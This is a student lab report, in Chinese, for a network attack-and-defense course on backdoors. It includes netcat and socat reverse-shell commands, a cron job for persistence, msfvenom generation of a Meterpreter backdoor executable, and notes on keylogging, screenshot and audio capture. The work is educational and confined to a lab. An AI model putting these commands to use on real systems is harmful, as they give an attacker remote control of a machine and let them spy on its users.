20145201 李子璇 《网络攻防》 后门原理与实践

1.基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式？

• 软件中本身就含有后门
• 和软件进行捆绑，下载打开后进入系统
• 由于系统漏洞，主机被攻击了，从而被安装了后门

(2)例举你知道的后门如何启动起来(win及linux)的方式？

• 让用户以为是正常的软件，启动软件时后门就启动。
• Linux定时任务系统 Cron，让使用者在固定时间或固定间隔执行程序。
• Win系统 用任务计划程序来定时自动运行程序

(3)Meterpreter有哪些给你映像深刻的功能？

• 记录键盘输入的字符
• 开启摄像头

(4)如何发现自己有系统有没有被安装后门？

• 系统运行速度突然变得缓慢：占用了内存和CPU资源，在后台运行了大量非法操作
• 检查系统对外开放的端口，看有没有可疑的进程使用某个端口传输数据。
  netstat –an来查看所有TCP/UDP端口的连接

2.实验总结与体会
本次实验我学习了nc如何获取远程主机的Shell，使用msfenom生成后门可执行文件，然后尝试了一些Meterpreter常用功能，如记录键盘的输入，截屏，对网络系统的操作等。这一路做下来感觉太可怕，我们现在做的对于大神来说恐怕只是小case而已，提高安全意识从贴上摄像头开始...

3.实践过程记录

(1)使用netcat获取主机操作Shell，cron启动

win获得linux shell

• win查看ip地址
  

• win打开监听（这时需要允许防火墙访问）
  

• linux反弹连接win
  

• 在在windows下就获得了linux的shell，可以运行linux下的指令，我选择运行ls命令尝试一下：
  
  成功了

linux获得win shell

• 在kali中获取linux的ip
  
• 在win下反弹连接linux
  输入c:\nc文件目录路径>ncat.exe -e cmd.exe 192.168.134.128 5201
• 连接上之后，在linux下可看到windows命令提示
  

cron启动

在linux终端输入crontab -e命令，可以修改用户的cron配置：

修改一下

此时，linux每分钟自动运行指令，反弹至win的5201端口。

可以使用命令crontab -l 查看查看配置文件

获取shell成功后，ls一下看看

(2)使用socat获取主机操作Shell, 任务计划启动

• windows使用socat获取kali shell：
  kali上用socat tcp-listen:5201把cmd绑定到端口5201
  并用socat tcp-l:5201 system:bash,pty,stderr反弹连接
  

windows使用socat readline tcp:192.168.134.129 5201开启监听

检测一下

(3)使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell(1分)

meterpreter

生成后门程序

• 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.26.155.4 LPORT=5201 -f exe > 5201lzx.exe来生成后门程序，然后用ncat方法发送到windows机中。

• 在Kali端用msfconsole指令进行msf设置，使用监听模块，设置payload，设置反弹回连的IP和端口。
  

• 运行 获取主机shell
  

(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权 (2分)

• 用screenshot来截个图吧..
  

• 获取记录击键记录..
  
  

• 获取音频..
  
  

不过 提权失败了...